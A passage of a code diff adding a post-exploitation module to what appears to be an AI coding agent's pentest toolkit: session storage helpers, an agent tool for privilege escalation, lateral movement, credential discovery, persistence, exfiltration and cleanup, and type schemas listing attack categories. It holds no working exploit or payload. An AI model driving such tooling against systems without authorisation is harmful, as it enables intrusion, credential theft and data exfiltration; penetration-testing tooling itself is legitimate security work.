+    // Sort by creation time (newest first)
+    artifacts.sort((a, b) => b.createdAt - a.createdAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      artifacts = artifacts.slice(0, filters.limit)
+    }
+
+    return artifacts
+  }
+
+  /**
+   * Mark an artifact as cleaned.
+   */
+  export async function markArtifactCleaned(
+    id: string,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.Artifact | null> {
+    const artifact = await getArtifact(id, config)
+    if (!artifact) return null
+
+    const updated: PostExploitTypes.Artifact = {
+      ...artifact,
+      cleaned: true,
+      cleanedAt: Date.now(),
+    }
+
+    return saveArtifact(updated, config)
+  }
+
+  // ========== Session Helpers ==========
+
+  /**
+   * Add a privesc vector to a session.
+   */
+  export async function addPrivescVector(
+    sessionId: string,
+    vector: Omit<PostExploitTypes.PrivescVector, "id" | "discoveredAt">,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.PrivescVector | null> {
+    const session = await getSession(sessionId, config)
+    if (!session) return null
+
+    const fullVector: PostExploitTypes.PrivescVector = {
+      ...vector,
+      id: generateItemId("privesc"),
+      discoveredAt: Date.now(),
+    }
+
+    session.privescVectors.push(fullVector)
+    session.stats.privescVectors = session.privescVectors.length
+    await saveSession(session, config)
+
+    return fullVector
+  }
+
+  /**
+   * Add a lateral target to a session.
+   */
+  export async function addLateralTarget(
+    sessionId: string,
+    target: Omit<PostExploitTypes.LateralTarget, "id" | "discoveredAt">,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.LateralTarget | null> {
+    const session = await getSession(sessionId, config)
+    if (!session) return null
+
+    const fullTarget: PostExploitTypes.LateralTarget = {
+      ...target,
+      id: generateItemId("lateral"),
+      discoveredAt: Date.now(),
+    }
+
+    session.lateralTargets.push(fullTarget)
+    session.stats.lateralTargets = session.lateralTargets.length
+    await saveSession(session, config)
+
+    return fullTarget
+  }
+
+  /**
+   * Add a lateral path to a session.
+   */
+  export async function addLateralPath(
+    sessionId: string,
+    path: Omit<PostExploitTypes.LateralPath, "id" | "discoveredAt">,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.LateralPath | null> {
+    const session = await getSession(sessionId, config)
+    if (!session) return null
+
+    const fullPath: PostExploitTypes.LateralPath = {
+      ...path,
+      id: generateItemId("path"),
+      discoveredAt: Date.now(),
+    }
+
+    session.lateralPaths.push(fullPath)
+    session.stats.lateralPaths = session.lateralPaths.length
+    await saveSession(session, config)
+
+    return fullPath
+  }
+
+  /**
+   * Add a credential location to a session.
+   */
+  export async function addCredentialLocation(
+    sessionId: string,
+    location: Omit<PostExploitTypes.CredentialLocation, "id" | "discoveredAt">,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.CredentialLocation | null> {
+    const session = await getSession(sessionId, config)
+    if (!session) return null
+
+    const fullLocation: PostExploitTypes.CredentialLocation = {
+      ...location,
+      id: generateItemId("credloc"),
+      discoveredAt: Date.now(),
+    }
+
+    session.credentialLocations.push(fullLocation)
+    session.stats.credentialLocations = session.credentialLocations.length
+    await saveSession(session, config)
+
+    return fullLocation
+  }
+
+  /**
+   * Add a persistence mechanism to a session.
+   */
+  export async function addPersistenceMechanism(
+    sessionId: string,
+    mechanism: Omit<PostExploitTypes.PersistenceMechanism, "id" | "catalogedAt">,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.PersistenceMechanism | null> {
+    const session = await getSession(sessionId, config)
+    if (!session) return null
+
+    const fullMechanism: PostExploitTypes.PersistenceMechanism = {
+      ...mechanism,
+      id: generateItemId("persist"),
+      catalogedAt: Date.now(),
+    }
+
+    session.persistenceOptions.push(fullMechanism)
+    session.stats.persistenceOptions = session.persistenceOptions.length
+    await saveSession(session, config)
+
+    return fullMechanism
+  }
+
+  /**
+   * Add a data target to a session.
+   */
+  export async function addDataTarget(
+    sessionId: string,
+    target: Omit<PostExploitTypes.DataTarget, "id" | "discoveredAt">,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.DataTarget | null> {
+    const session = await getSession(sessionId, config)
+    if (!session) return null
+
+    const fullTarget: PostExploitTypes.DataTarget = {
+      ...target,
+      id: generateItemId("data"),
+      discoveredAt: Date.now(),
+    }
+
+    session.dataTargets.push(fullTarget)
+    session.stats.dataTargets = session.dataTargets.length
+    await saveSession(session, config)
+
+    return fullTarget
+  }
+
+  /**
+   * Add an exfil channel to a session.
+   */
+  export async function addExfilChannel(
+    sessionId: string,
+    channel: Omit<PostExploitTypes.ExfilChannel, "id" | "analyzedAt">,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.ExfilChannel | null> {
+    const session = await getSession(sessionId, config)
+    if (!session) return null
+
+    const fullChannel: PostExploitTypes.ExfilChannel = {
+      ...channel,
+      id: generateItemId("exfil"),
+      analyzedAt: Date.now(),
+    }
+
+    session.exfilChannels.push(fullChannel)
+    session.stats.exfilChannels = session.exfilChannels.length
+    await saveSession(session, config)
+
+    return fullChannel
+  }
+
+  /**
+   * Add an artifact to a session.
+   */
+  export async function addSessionArtifact(
+    sessionId: string,
+    artifact: Omit<PostExploitTypes.Artifact, "id" | "createdAt">,
+    config: StorageConfig = {}
+  ): Promise<PostExploitTypes.Artifact | null> {
+    const session = await getSession(sessionId, config)
+    if (!session) return null
+
+    const fullArtifact: PostExploitTypes.Artifact = {
+      ...artifact,
+      id: generateItemId("artifact"),
+      createdAt: Date.now(),
+    }
+
+    session.artifacts.push(fullArtifact)
+    session.stats.artifacts = session.artifacts.length
+    await saveSession(session, config)
+
+    // Also save to global artifacts
+    await saveArtifact(fullArtifact, config)
+
+    return fullArtifact
+  }
+
+  // ========== Memory Management ==========
+
+  /**
+   * Clear memory buffers (testing).
+   */
+  export function clearMemory(): void {
+    sessionBuffer.length = 0
+    credentialBuffer.length = 0
+    artifactBuffer.length = 0
+  }
+
+  /**
+   * Get memory counts (testing).
+   */
+  export function memoryCount(): {
+    sessions: number
+    credentials: number
+    artifacts: number
+  } {
+    return {
+      sessions: sessionBuffer.length,
+      credentials: credentialBuffer.length,
+      artifacts: artifactBuffer.length,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/tool.ts b/packages/opencode/src/pentest/postexploit/tool.ts
new file mode 100644
index 00000000000..8b52dec04f2
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/tool.ts
@@ -0,0 +1,797 @@
+/**
+ * @fileoverview Post-Exploitation Tool
+ *
+ * Agent tool for post-exploitation guidance including privilege escalation,
+ * lateral movement, credential discovery, persistence, exfiltration, and cleanup.
+ *
+ * @module pentest/postexploit/tool
+ */
+
+import z from "zod"
+import { readFile } from "fs/promises"
+import { Tool } from "../../tool/tool"
+import { PostExploitTypes } from "./types"
+import { PostExploitOrchestrator } from "./orchestrator"
+import { PostExploitProfiles } from "./profiles"
+import { PostExploitStorage } from "./storage"
+import { Parsers } from "./parsers"
+
+/**
+ * Post-Exploitation Tool for penetration testing.
+ *
+ * Provides guidance for privilege escalation, lateral movement, credential
+ * harvesting, persistence mechanisms, data exfiltration, and cleanup.
+ */
+export const PostExploitTool = Tool.define("postexploit", async () => {
+  return {
+    description: `Post-exploitation guidance framework for penetration testing.
+
+ACTIONS:
+- session: Create or manage a post-exploitation session
+- privesc: Scan for privilege escalation vectors
+- lateral: Discover lateral movement targets and paths
+- creds: Discover credential storage locations
+- persist: Catalog persistence mechanisms
+- exfil: Discover data targets and exfiltration channels
+- cleanup: Generate cleanup guidance and checklist
+- parse: Parse LinPEAS/WinPEAS output
+- status: Get session status and summary
+- profiles: List available assessment profiles
+- assess: Run full assessment based on profile
+
+PROFILES:
+- discovery: Passive enumeration only (stealth)
+- quick: Fast assessment of critical vectors
+- standard: Balanced assessment with full coverage
+- thorough: Deep comprehensive assessment
+- stealth: Low-noise passive techniques only
+
+EXAMPLES:
+- Create session: action="session", target="192.168.1.100", platform="linux", user="www-data"
+- Privesc scan: action="privesc", sessionId="<id>"
+- Parse LinPEAS: action="parse", tool="linpeas", file="/tmp/linpeas.txt"
+- Full assessment: action="assess", sessionId="<id>"
+- Get status: action="status", sessionId="<id>"`,
+
+    parameters: z.object({
+      action: z
+        .enum([
+          "session",
+          "privesc",
+          "lateral",
+          "creds",
+          "persist",
+          "exfil",
+          "cleanup",
+          "parse",
+          "status",
+          "profiles",
+          "assess",
+          "list",
+        ])
+        .describe("Action to perform"),
+
+      // Session creation
+      target: z.string().optional().describe("Target IP/hostname"),
+      platform: z.enum(["linux", "windows"]).optional().describe("Target platform"),
+      user: z.string().optional().describe("Current username on target"),
+      privilege: z.enum(["user", "admin", "root", "system"]).optional().describe("Current privilege level"),
+      hostname: z.string().optional().describe("Target hostname"),
+      domain: z.string().optional().describe("AD domain (if applicable)"),
+      profile: z
+        .enum(["discovery", "quick", "standard", "thorough", "stealth"])
+        .optional()
+        .describe("Assessment profile"),
+
+      // Session reference
+      sessionId: z.string().optional().describe("Session ID for operations"),
+
+      // Parse options
+      tool: z.enum(["linpeas", "winpeas"]).optional().describe("Parser tool type"),
+      file: z.string().optional().describe("Path to tool output file"),
+      content: z.string().optional().describe("Tool output content (if not using file)"),
+
+      // General options
+      dryRun: z.boolean().optional().describe("Show commands without executing"),
+      verbose: z.boolean().optional().describe("Show detailed output"),
+      limit: z.number().optional().describe("Limit results returned"),
+    }),
+
+    async execute(params) {
+      switch (params.action) {
+        case "session":
+          return handleSession(params)
+
+        case "privesc":
+          return handlePrivesc(params)
+
+        case "lateral":
+          return handleLateral(params)
+
+        case "creds":
+          return handleCreds(params)
+
+        case "persist":
+          return handlePersist(params)
+
+        case "exfil":
+          return handleExfil(params)
+
+        case "cleanup":
+          return handleCleanup(params)
+
+        case "parse":
+          return handleParse(params)
+
+        case "status":
+          return handleStatus(params)
+
+        case "profiles":
+          return handleProfiles()
+
+        case "assess":
+          return handleAssess(params)
+
+        case "list":
+          return handleList(params)
+
+        default:
+          return {
+            title: `Unknown action: ${params.action}`,
+            output: `Supported actions: session, privesc, lateral, creds, persist, exfil, cleanup, parse, status, profiles, assess, list`,
+            metadata: { action: params.action, status: "error" },
+          }
+      }
+    },
+  }
+})
+
+/**
+ * Handle session action - create or manage session.
+ */
+async function handleSession(params: {
+  target?: string
+  platform?: PostExploitTypes.Platform
+  user?: string
+  privilege?: "user" | "admin" | "root" | "system"
+  hostname?: string
+  domain?: string
+  profile?: PostExploitTypes.ProfileId
+}): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.target || !params.platform || !params.user) {
+    return {
+      title: "Session requires target, platform, and user",
+      output: `Required parameters:
+  - target: Target IP or hostname (e.g., "192.168.1.100")
+  - platform: "linux" or "windows"
+  - user: Current username on target (e.g., "www-data")
+
+Optional parameters:
+  - privilege: Current privilege level ("user", "admin", "root", "system"). Default: "user"
+  - hostname: Target hostname
+  - domain: AD domain name
+  - profile: Assessment profile ("discovery", "quick", "standard", "thorough", "stealth"). Default: "standard"`,
+      metadata: { action: "session", status: "error" },
+    }
+  }
+
+  try {
+    const session = await PostExploitOrchestrator.createSession({
+      target: params.target,
+      platform: params.platform,
+      currentUser: params.user,
+      currentPrivilege: params.privilege || "user",
+      hostname: params.hostname,
+      domain: params.domain,
+      profile: params.profile,
+    })
+
+    const profileInfo = PostExploitProfiles.get(session.profile) || PostExploitProfiles.Standard
+
+    const lines: string[] = []
+    lines.push("POST-EXPLOITATION SESSION CREATED")
+    lines.push("=".repeat(40))
+    lines.push("")
+    lines.push(`Session ID: ${session.id}`)
+    lines.push(`Target: ${session.target}`)
+    lines.push(`Platform: ${session.platform}`)
+    lines.push(`User: ${session.currentUser} (${session.currentPrivilege})`)
+    if (session.hostname) lines.push(`Hostname: ${session.hostname}`)
+    if (session.domain) lines.push(`Domain: ${session.domain}`)
+    lines.push(`Profile: ${profileInfo.name}`)
+    lines.push(`Status: ${session.status}`)
+    lines.push("")
+    lines.push("Next steps:")
+    lines.push(`  - Run privesc scan: postexploit action="privesc" sessionId="${session.id}"`)
+    lines.push(`  - Run full assessment: postexploit action="assess" sessionId="${session.id}"`)
+    lines.push(`  - Parse tool output: postexploit action="parse" tool="linpeas" file="/path/to/output.txt" sessionId="${session.id}"`)
+
+    return {
+      title: `Session created: ${session.id}`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "session",
+        sessionId: session.id,
+        target: session.target,
+        platform: session.platform,
+        profile: session.profile,
+        status: "created",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Session creation failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "session", status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle privesc action.
+ */
+async function handlePrivesc(params: {
+  sessionId?: string
+  dryRun?: boolean
+  verbose?: boolean
+}): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.sessionId) {
+    return {
+      title: "Privesc requires sessionId",
+      output: "Please provide a session ID. Create a session first with action='session'.",
+      metadata: { action: "privesc", status: "error" },
+    }
+  }
+
+  try {
+    const result = await PostExploitOrchestrator.scanPrivesc({
+      sessionId: params.sessionId,
+      dryRun: params.dryRun,
+      verbose: params.verbose,
+    })
+
+    const lines: string[] = []
+    lines.push("PRIVILEGE ESCALATION SCAN")
+    lines.push("=".repeat(40))
+    lines.push("")
+    lines.push(`Found ${result.vectors.length} potential vector(s)`)
+    lines.push("")
+
+    if (result.commands.length > 0) {
+      lines.push("Discovery Commands:")
+      for (const cmd of result.commands.slice(0, 10)) {
+        lines.push(`  ${cmd}`)
+      }
+      if (result.commands.length > 10) {
+        lines.push(`  ... and ${result.commands.length - 10} more`)
+      }
+      lines.push("")
+    }
+
+    lines.push(result.summary)
+
+    return {
+      title: `Privesc: ${result.vectors.length} vector(s)`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "privesc",
+        sessionId: params.sessionId,
+        vectorCount: result.vectors.length,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Privesc scan failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "privesc", sessionId: params.sessionId, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle lateral action.
+ */
+async function handleLateral(params: {
+  sessionId?: string
+  dryRun?: boolean
+  verbose?: boolean
+}): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.sessionId) {
+    return {
+      title: "Lateral requires sessionId",
+      output: "Please provide a session ID.",
+      metadata: { action: "lateral", status: "error" },
+    }
+  }
+
+  try {
+    const result = await PostExploitOrchestrator.scanLateral({
+      sessionId: params.sessionId,
+      dryRun: params.dryRun,
+      verbose: params.verbose,
+    })
+
+    return {
+      title: "Lateral movement guidance",
+      output: result.summary,
+      metadata: {
+        action: "lateral",
+        sessionId: params.sessionId,
+        targetCount: result.targets.length,
+        pathCount: result.paths.length,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Lateral scan failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "lateral", sessionId: params.sessionId, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle creds action.
+ */
+async function handleCreds(params: {
+  sessionId?: string
+  dryRun?: boolean
+  verbose?: boolean
+}): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.sessionId) {
+    return {
+      title: "Creds requires sessionId",
+      output: "Please provide a session ID.",
+      metadata: { action: "creds", status: "error" },
+    }
+  }
+
+  try {
+    const result = await PostExploitOrchestrator.scanCreds({
+      sessionId: params.sessionId,
+      dryRun: params.dryRun,
+      verbose: params.verbose,
+    })
+
+    const lines: string[] = []
+    lines.push("CREDENTIAL DISCOVERY")
+    lines.push("=".repeat(40))
+    lines.push("")
+    lines.push(`Found ${result.locations.length} credential location(s)`)
+    lines.push("")
+    lines.push(result.summary)
+
+    return {
+      title: `Creds: ${result.locations.length} location(s)`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "creds",
+        sessionId: params.sessionId,
+        locationCount: result.locations.length,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Creds scan failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "creds", sessionId: params.sessionId, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle persist action.
+ */
+async function handlePersist(params: {
+  sessionId?: string
+  dryRun?: boolean
+  verbose?: boolean
+}): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.sessionId) {
+    return {
+      title: "Persist requires sessionId",
+      output: "Please provide a session ID.",
+      metadata: { action: "persist", status: "error" },
+    }
+  }
+
+  try {
+    const result = await PostExploitOrchestrator.scanPersist({
+      sessionId: params.sessionId,
+      dryRun: params.dryRun,
+      verbose: params.verbose,
+    })
+
+    const lines: string[] = []
+    lines.push("PERSISTENCE CATALOG")
+    lines.push("=".repeat(40))
+    lines.push("")
+    lines.push(`Cataloged ${result.mechanisms.length} persistence mechanism(s)`)
+    lines.push("")
+    lines.push(result.summary)
+
+    return {
+      title: `Persist: ${result.mechanisms.length} mechanism(s)`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "persist",
+        sessionId: params.sessionId,
+        mechanismCount: result.mechanisms.length,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Persist scan failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "persist", sessionId: params.sessionId, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle exfil action.
+ */
+async function handleExfil(params: {
+  sessionId?: string
+  dryRun?: boolean
+  verbose?: boolean
+}): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.sessionId) {
+    return {
+      title: "Exfil requires sessionId",
+      output: "Please provide a session ID.",
+      metadata: { action: "exfil", status: "error" },
+    }
+  }
+
+  try {
+    const result = await PostExploitOrchestrator.scanExfil({
+      sessionId: params.sessionId,
+      dryRun: params.dryRun,
+      verbose: params.verbose,
+    })
+
+    const lines: string[] = []
+    lines.push("DATA EXFILTRATION DISCOVERY")
+    lines.push("=".repeat(40))
+    lines.push("")
+    lines.push(`Data Targets: ${result.targets.length}`)
+    lines.push(`Exfil Channels: ${result.channels.length}`)
+    lines.push("")
+    lines.push(result.summary)
+
+    return {
+      title: `Exfil: ${result.channels.length} channel(s)`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "exfil",
+        sessionId: params.sessionId,
+        targetCount: result.targets.length,
+        channelCount: result.channels.length,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Exfil scan failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "exfil", sessionId: params.sessionId, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle cleanup action.
+ */
+async function handleCleanup(params: {
+  sessionId?: string
+  dryRun?: boolean
+  verbose?: boolean
+}): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.sessionId) {
+    return {
+      title: "Cleanup requires sessionId",
+      output: "Please provide a session ID.",
+      metadata: { action: "cleanup", status: "error" },
+    }
+  }
+
+  try {
+    const result = await PostExploitOrchestrator.generateCleanup({
+      sessionId: params.sessionId,
+      dryRun: params.dryRun,
+      verbose: params.verbose,
+    })
+
+    const lines: string[] = []
+    lines.push("CLEANUP GUIDANCE")
+    lines.push("=".repeat(40))
+    lines.push("")
+    lines.push(`Checklist Items: ${result.checklist.length}`)
+    lines.push("")
+    lines.push(result.summary)
+
+    return {
+      title: `Cleanup: ${result.checklist.length} item(s)`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "cleanup",
+        sessionId: params.sessionId,
+        checklistItems: result.checklist.length,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Cleanup generation failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "cleanup", sessionId: params.sessionId, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle parse action.
+ */
+async function handleParse(params: {
+  tool?: Parsers.ParserType
+  file?: string
+  content?: string
+  sessionId?: string
+}): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  let parseContent = params.content
+
+  if (params.file) {
+    try {
+      parseContent = await readFile(params.file, "utf-8")
+    } catch (error) {
+      return {
+        title: "Failed to read file",
+        output: `Error reading file ${params.file}: ${error instanceof Error ? error.message : String(error)}`,
+        metadata: { action: "parse", file: params.file, status: "error" },
+      }
+    }
+  }
+
+  if (!parseContent) {
+    return {
+      title: "Parse requires content or file",
+      output: `Please provide either:
+  - file: Path to LinPEAS/WinPEAS output file
+  - content: Raw tool output content
+
+Optional:
+  - tool: "linpeas" or "winpeas" (auto-detected if not specified)
+  - sessionId: Session ID to add vectors to`,
+      metadata: { action: "parse", status: "error" },
+    }
+  }
+
+  // Auto-detect tool if not specified
+  const detectedTool = params.tool || Parsers.detectType(parseContent)
+  if (!detectedTool) {
+    return {
+      title: "Could not detect tool type",
+      output: "Please specify tool='linpeas' or tool='winpeas'.",
+      metadata: { action: "parse", status: "error" },
+    }
+  }
+
+  try {
+    const result = await PostExploitOrchestrator.parsePEAS({
+      tool: detectedTool,
+      content: parseContent,
+      sessionId: params.sessionId,
+    })
+
+    const lines: string[] = []
+    lines.push(`${detectedTool.toUpperCase()} PARSE RESULTS`)
+    lines.push("=".repeat(40))
+    lines.push("")
+    lines.push(`Total Findings: ${result.result.summary.totalFindings}`)
+    lines.push(`  Critical: ${result.result.summary.criticalFindings}`)
+    lines.push(`  High: ${result.result.summary.highFindings}`)
+    lines.push(`  Medium: ${result.result.summary.mediumFindings}`)
+    lines.push(`  Low: ${result.result.summary.lowFindings}`)
+    lines.push(`Privesc Vectors: ${result.result.summary.privescVectorCount}`)
+
+    if (params.sessionId) {
+      lines.push("")
+      lines.push(`Added ${result.vectorsAdded} vectors to session ${params.sessionId}`)
+    }
+
+    lines.push("")
+    lines.push(result.summary)
+
+    return {
+      title: `Parsed: ${result.result.summary.privescVectorCount} vector(s)`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "parse",
+        tool: detectedTool,
+        totalFindings: result.result.summary.totalFindings,
+        privescVectors: result.result.summary.privescVectorCount,
+        criticalFindings: result.result.summary.criticalFindings,
+        vectorsAdded: result.vectorsAdded,
+        sessionId: params.sessionId,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Parse failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "parse", tool: detectedTool, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle status action.
+ */
+async function handleStatus(params: {
+  sessionId?: string
+}): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.sessionId) {
+    return {
+      title: "Status requires sessionId",
+      output: "Please provide a session ID. Use action='list' to see all sessions.",
+      metadata: { action: "status", status: "error" },
+    }
+  }
+
+  try {
+    const result = await PostExploitOrchestrator.getSessionStatus(params.sessionId)
+
+    if (!result.session) {
+      return {
+        title: "Session not found",
+        output: `No session with ID: ${params.sessionId}`,
+        metadata: { action: "status", sessionId: params.sessionId, status: "not_found" },
+      }
+    }
+
+    return {
+      title: `Session: ${result.session.status}`,
+      output: result.summary,
+      metadata: {
+        action: "status",
+        sessionId: params.sessionId,
+        sessionStatus: result.session.status,
+        stats: result.session.stats,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Status check failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "status", sessionId: params.sessionId, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle profiles action.
+ */
+function handleProfiles(): { title: string; output: string; metadata: Record<string, unknown> } {
+  const lines: string[] = []
+  lines.push("POST-EXPLOITATION PROFILES")
+  lines.push("=".repeat(40))
+  lines.push("")
+  lines.push(PostExploitOrchestrator.formatProfiles())
+  lines.push("")
+  lines.push("Usage:")
+  lines.push(`  postexploit action="session" target="192.168.1.100" platform="linux" user="www-data" profile="standard"`)
+
+  return {
+    title: "Assessment profiles",
+    output: lines.join("\n"),
+    metadata: { action: "profiles", count: PostExploitProfiles.list().length, status: "completed" },
+  }
+}
+
+/**
+ * Handle assess action - run full assessment.
+ */
+async function handleAssess(params: {
+  sessionId?: string
+  dryRun?: boolean
+  verbose?: boolean
+}): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  if (!params.sessionId) {
+    return {
+      title: "Assess requires sessionId",
+      output: "Please provide a session ID. Create a session first with action='session'.",
+      metadata: { action: "assess", status: "error" },
+    }
+  }
+
+  try {
+    const result = await PostExploitOrchestrator.runAssessment({
+      sessionId: params.sessionId,
+      dryRun: params.dryRun,
+      verbose: params.verbose,
+    })
+
+    if (!result.session) {
+      return {
+        title: "Session not found",
+        output: `No session with ID: ${params.sessionId}`,
+        metadata: { action: "assess", sessionId: params.sessionId, status: "not_found" },
+      }
+    }
+
+    return {
+      title: `Assessment complete`,
+      output: result.summary,
+      metadata: {
+        action: "assess",
+        sessionId: params.sessionId,
+        sessionStatus: result.session.status,
+        stats: result.session.stats,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Assessment failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "assess", sessionId: params.sessionId, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle list action - list sessions.
+ */
+async function handleList(params: {
+  limit?: number
+}): Promise<{ title: string; output: string; metadata: Record<string, unknown> }> {
+  try {
+    const sessions = await PostExploitOrchestrator.listSessions(undefined, {
+      limit: params.limit || 20,
+    })
+
+    if (sessions.length === 0) {
+      return {
+        title: "No sessions found",
+        output: "No post-exploitation sessions have been created.\n\nCreate one with:\n  postexploit action=\"session\" target=\"192.168.1.100\" platform=\"linux\" user=\"www-data\"",
+        metadata: { action: "list", count: 0, status: "completed" },
+      }
+    }
+
+    const lines: string[] = []
+    lines.push("POST-EXPLOITATION SESSIONS")
+    lines.push("=".repeat(60))
+    lines.push("")
+    lines.push("| Session ID | Target | Platform | User | Profile | Status |")
+    lines.push("|------------|--------|----------|------|---------|--------|")
+
+    for (const session of sessions) {
+      const idShort = session.id.substring(0, 20) + "..."
+      lines.push(
+        `| ${idShort.padEnd(24)} | ${session.target.padEnd(15).substring(0, 15)} | ${session.platform.padEnd(8)} | ${session.currentUser.padEnd(10).substring(0, 10)} | ${session.profile.padEnd(9)} | ${session.status.padEnd(9)} |`
+      )
+    }
+
+    lines.push("")
+    lines.push(`Total: ${sessions.length} session(s)`)
+
+    return {
+      title: `${sessions.length} session(s)`,
+      output: lines.join("\n"),
+      metadata: { action: "list", count: sessions.length, status: "completed" },
+    }
+  } catch (error) {
+    return {
+      title: "List failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "list", status: "error" },
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/types.ts b/packages/opencode/src/pentest/postexploit/types.ts
new file mode 100644
index 00000000000..333a8da9974
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/types.ts
@@ -0,0 +1,965 @@
+/**
+ * @fileoverview Post-Exploitation Framework Types
+ *
+ * Zod schemas and TypeScript types for post-exploitation guidance,
+ * including privilege escalation, lateral movement, credential harvesting,
+ * persistence mechanisms, data exfiltration, and cleanup procedures.
+ *
+ * @module pentest/postexploit/types
+ */
+
+import z from "zod"
+
+/**
+ * Post-exploitation types namespace.
+ */
+export namespace PostExploitTypes {
+  // ============================================
+  // Enums and Literals
+  // ============================================
+
+  /**
+   * Target platform.
+   */
+  export const Platform = z.enum(["linux", "windows"])
+  export type Platform = z.infer<typeof Platform>
+
+  /**
+   * Session status values.
+   */
+  export const Status = z.enum(["running", "completed", "failed", "paused"])
+  export type Status = z.infer<typeof Status>
+
+  /**
+   * Severity/risk levels.
+   */
+  export const Severity = z.enum(["critical", "high", "medium", "low", "info"])
+  export type Severity = z.infer<typeof Severity>
+
+  /**
+   * Detection risk levels.
+   */
+  export const DetectionRisk = z.enum(["low", "medium", "high"])
+  export type DetectionRisk = z.infer<typeof DetectionRisk>
+
+  /**
+   * Exploitability levels.
+   */
+  export const Exploitability = z.enum(["trivial", "easy", "moderate", "difficult"])
+  export type Exploitability = z.infer<typeof Exploitability>
+
+  /**
+   * Assessment profile IDs.
+   */
+  export const ProfileId = z.enum(["discovery", "quick", "standard", "thorough", "stealth"])
+  export type ProfileId = z.infer<typeof ProfileId>
+
+  // ============================================
+  // Privilege Escalation Types
+  // ============================================
+
+  /**
+   * Linux privesc categories.
+   */
+  export const LinuxPrivescCategory = z.enum([
+    "suid",
+    "sudo",
+    "capabilities",
+    "cron",
+    "kernel",
+    "service",
+    "path_hijack",
+    "container_escape",
+    "nfs",
+    "writeable_files",
+    "password_files",
+    "ssh_keys",
+  ])
+  export type LinuxPrivescCategory = z.infer<typeof LinuxPrivescCategory>
+
+  /**
+   * Windows privesc categories.
+   */
+  export const WindowsPrivescCategory = z.enum([
+    "service",
+    "registry",
+    "token",
+    "scheduled_task",
+    "dll_hijack",
+    "uac_bypass",
+    "always_install_elevated",
+    "unquoted_path",
+    "stored_credentials",
+    "kernel",
+    "potato",
+    "printspoofer",
+  ])
+  export type WindowsPrivescCategory = z.infer<typeof WindowsPrivescCategory>
+
+  /**
+   * Combined privesc category.
+   */
+  export const PrivescCategory = z.union([LinuxPrivescCategory, WindowsPrivescCategory])
+  export type PrivescCategory = z.infer<typeof PrivescCategory>
+
+  /**
+   * Privilege escalation vector.
+   */
+  export const PrivescVector = z.object({
+    id: z.string(),
+    category: PrivescCategory,
+    platform: Platform,
+    name: z.string(),
+    description: z.string(),
+    risk: Severity,
+    exploitability: Exploitability,
+    target: z.string(), // Binary path, service name, etc.
+    technique: z.string(),
+    commands: z.array(z.string()), // Guidance commands (not automated)
+    prerequisites: z.array(z.string()).default([]),
+    detectionRisk: DetectionRisk,
